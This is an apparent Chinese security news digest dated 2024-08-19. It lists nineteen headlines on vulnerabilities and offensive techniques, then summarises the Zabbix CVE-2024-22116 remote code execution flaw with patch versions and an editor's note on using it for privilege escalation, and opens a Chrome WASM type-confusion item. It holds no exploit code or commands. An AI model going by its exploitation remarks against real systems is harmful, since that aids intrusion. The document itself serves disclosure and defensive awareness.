<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-08-19 「红蓝热点」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">「新、热、赞」</code>，帮部分人<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">阅读提效</code><br/>
			2. 学有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">精读浅读深读</code>，艺有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">会熟精绝化</code>，觉知此事<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">重躬行</code>。推送只在<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">浅读预览</code><br/>
			3. 机读为主，人工辅助，每日数万网站，10w推特速读<br/>
			4. 推送可能<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">大众或小众</code>，不代表本人偏好或认可<br/>
			5. 因渲染和外链原因，公众号<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">甲方安全建设</code>发送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">日报</code>或日期,如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">20240819</code>获取<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">图文评论版pdf</code>
		</p>
	</blockquote><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">目录</span></h3><blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">0x01 【2024-0813】Zabbix监控解决方案发现关键RCE漏洞<br/>0x02 【2024-0813】Google Chrome 远程代码执行漏洞<br/>0x03 【2024-0814】Chrome渲染器中的对象转换至远程代码执行漏洞分析<br/>0x04 【2024-0814】远程禁用Windows事件日志的0day漏洞及免费微补丁<br/>0x05 【2024-0814】揭秘#GrimResource：滥用MSC文件格式<br/>0x06 【2024-0814】NTLM Relay攻击：网络入侵的终极手段<br/>0x07 【2024-0815】Android Jetpack导航库深层次安全漏洞<br/>0x08 【2024-0815】Lil Pwny 3.2.0更新：优化Active Directory密码审计<br/>0x09 【2024-0816】利用UDL文件进行网络钓鱼攻击的新技术<br/>0x0a 【2024-0816】Copy2Pwn漏洞绕过Windows网络保护<br/>0x0b 【2024-0816】结合历史泄露与CSS的水坑攻击<br/>0x0c 【2024-0816】GitHub项目ggerganov/llama.cpp中的rpc_server::get_tensor功能存在任意地址读取漏洞<br/>0x0d 【2024-0818】恶意签名注入：利用Evil Signatures远程删除数据库和邮箱<br/>0x0e 【2024-0818】Python脚本模拟IPv6数据包处理漏洞<br/>0x0f 【2024-0819】BounceBack：红队操作安全的隐蔽重定向工具<br/>0x10 【2024-0819】SpoofDPI：一款快速绕过深度包检测的软件<br/>0x11 【2024-0819】CVE-2024-7646：Ingress-NGINX注解验证绕过漏洞深度解析<br/>0x12 【2024-0819】Linux内核修复Landlock安全漏洞<br/>0x13 【2024-0819】Windows Secure Channel RCE漏洞CVE-2024-38148详解<br/></p></blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 Zabbix监控解决方案发现关键RCE漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Zabbix监控解决方案发现了一个关键的远程代码执行（RCE）漏洞（CVE-2024-22116），该漏洞评分为CVSS 9.9，可能导致系统完全妥协。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:后台漏洞，低权限用户提权场景可用. 高权限用户可以直接写脚本执行命令的.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Zabbix 监控系统发现严重 RCE 漏洞 CVE-2024-22116</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgo9hIxyJclia0H4RrXzh9OdpAJku0Z6ozELCs9rSLk4RcOGkPqvxwlxA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgo9hIxyJclia0H4RrXzh9OdpAJku0Z6ozELCs9rSLk4RcOGkPqvxwlxA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855184542111152"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Zabbix的广泛采用和灵活性增加了安全风险：作为一个流行的监控工具，Zabbix的广泛应用和能够监控各种IT资源的能力，虽然提供了高度的灵活性，但同时也增加了安全风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-22116漏洞的严重性：该漏洞被评为CVSS 9.9分，表明其对组织的潜在影响极大。如果不加修补，可能导致系统完全妥协。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">受影响的Zabbix版本和修复版本：受影响的版本包括6.4.0至6.4.15和7.0.0alpha1至7.0.0rc2，已在6.4.16rc1和7.0.0rc3版本中修复。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">升级至最新版本的紧急性：管理员应立即升级到修复版本以防止漏洞被利用。</section></li></ul>
	<br/>
	<p>🏷️: 漏洞, Zabbix, RCE, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 Google Chrome 远程代码执行漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Google Chrome 存在一个远程代码执行（RCE）漏洞，由于 WASM 类型不一致和 JS-to-WASM 转换过程中的类型混淆，可能导致任意 WASM 类型之间的类型混淆。</span>
		</p>
	</blockquote>


